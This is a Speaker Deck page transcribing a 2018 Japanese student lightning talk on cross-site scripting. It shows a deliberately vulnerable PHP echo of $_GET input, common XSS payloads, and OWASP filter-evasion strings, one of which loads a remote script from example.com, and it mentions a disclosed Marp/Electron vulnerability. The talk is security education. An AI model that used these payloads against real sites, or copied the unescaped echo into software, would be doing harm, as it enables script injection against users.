Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
XSSの入力値を調べてみた / searching xss insertion value
Search
Tomoyuki KOYAMA
February 03, 2018
Technology
3
1.4k
XSSの入力値を調べてみた / searching xss insertion value
2018/02/03 学生LT at freee
Tomoyuki KOYAMA
February 03, 2018
Tweet
Share
More Decks by Tomoyuki KOYAMA
See All by Tomoyuki KOYAMA
Reading HTTP Client Hints
tomoyk
0
77
Log message with JSON item count for root cause analysis in microservices
tomoyk
0
180
Distributed Log Search Based on Time Series Access and Service Relations
tomoyk
0
310
Webアプリを動かすまでのインフラ構築 / infra-build-for-web-app
tomoyk
0
400
コンピュータが大好きな私が大学院進学した理由 / Why I chose graduate school
tomoyk
2
880
この先生きのこるための学び方 / how-to-learn-tech
tomoyk
1
370
佐川急便のフィッシングサイトを調べてみた / Analysis of sagawa fishing site
tomoyk
1
170
既存のWebアプリをセキュアにするためにやったこと / Student-LT-WebSec
tomoyk
0
180
パケットを覗いてみよう / Packet workshop for beginners
tomoyk
0
320
Other Decks in Technology
See All in Technology
Introduction to Sansan, inc / Sansan Global Development Center, Inc.
sansan33
PRO
0
2.6k
フルカイテン株式会社 エンジニア向け採用資料
fullkaiten
0
6.7k
Autonomous Database サービス・アップデート (FY25)
oracle4engineer
PRO
1
730
Drawing with LLMs
rist
0
220
Sansan Engineering Unit 紹介資料
sansan33
PRO
1
2k
Generational ZGCのメモリ運用改善 - その物理メモリ使用量、本当に正しい?
tabatad
0
280
データ戦略部門 紹介資料
sansan33
PRO
1
3.1k
現場で役立つAPIデザイン
nagix
1
190
Bill One 開発エンジニア 紹介資料
sansan33
PRO
4
12k
Tenstorrent HW/SW 概要説明
tenstorrent_japan
0
240
うちの会社の評判は?SNSの投稿分析にAIを使ってみた
doumae
0
620
libsyncrpcってなに?
uhyo
0
250
Featured
See All Featured
Code Review Best Practice
trishagee
68
18k
Building Applications with DynamoDB
mza
95
6.4k
Designing for humans not robots
tammielis
253
25k
GraphQLとの向き合い方2022年版
quramy
46
14k
Producing Creativity
orderedlist
PRO
346
40k
Sharpening the Axe: The Primacy of Toolmaking
bcantrill
42
2.4k
The Cult of Friendly URLs
andyhume
78
6.4k
The Cost Of JavaScript in 2023
addyosmani
49
8.3k
Visualizing Your Data: Incorporating Mongo into Loggly Infrastructure
mongodb
45
9.6k
How to train your dragon (web standard)
notwaldorf
92
6.1k
Why You Should Never Use an ORM
jnunemaker
PRO
56
9.4k
Build The Right Thing And Hit Your Dates
maggiecrowley
35
2.7k
Transcript
XSS
B1 Twitter: @tmyk_kym : https://blog.koyama.me/ : Network/Web/Server/Security : PyCon JP,
Seccamp, etc
XSS (Cross Site Scripting) HTML CWE-79: Improper Neutralization of Input
During Web Page Generation ('Cross-site Scripting') (3.0)
... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];
?></h1> $_GET['mode'] hello <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1>hello</h1>
... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];
?></h1> $_GET['mode'] <script>alert()</script> <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><script>alert()</script></h1>
XSS Stored XSS( ) Re ected XSS( ) DOM Based
XSS
XSS == XSS
<script>alert(1)</script> "><script>alert(1)</script> " onmouseover="alert(1) x" onerror="alert(1) <- img src javascript:alert(1)
<- a href
XSS
? / . XSS . XSS .
?
OWASP OWASP XSS 2015 XSS - OWASP https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html
( ) 3
[1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">
</script>
[2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>
[3] <img src=x onerror=javas cript:ale rt('XSS')> &#x... HTML (16 )
. ... <img src="x" onerror="javascript:alert('XSS')">
( )
( ) <img src=javascript:alert('XSS')> <img src=javascript: alert(String.fromCharCode(88,83,83))> <META HTTP-EQUIV="refresh" CONTENT="3;
URL=http://;URL=http://yahoo.co.jp/;">
None
Electron Marp Electron Web ... <script>alert()</script> alert ...( )
?
JVN#21174546: Marp JavaScript https://jvn.jp/jp/JVN21174546/ However, sanitizing inline script should consider
on future. [Security issue] Remote script can read user local resource · Issue #187 · yhatt/marp “ “
XSS XSS alert() Electron
tomoyk
sansan33
fullkaiten
oracle4engineer
rist
tabatad
nagix
tenstorrent_japan
doumae
uhyo
trishagee
mza
tammielis
quramy
orderedlist
bcantrill
andyhume
addyosmani
mongodb
notwaldorf
jnunemaker
maggiecrowley
![... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_3.jpg){kind=link}
![... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_4.jpg){kind=link}
![[1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_13.jpg){kind=link}
![[2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_14.jpg){kind=link}
![[3] <img src=x onerror=javas cript:ale rt('XSS')> &#x... HTML (16 )](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_15.jpg){kind=link}
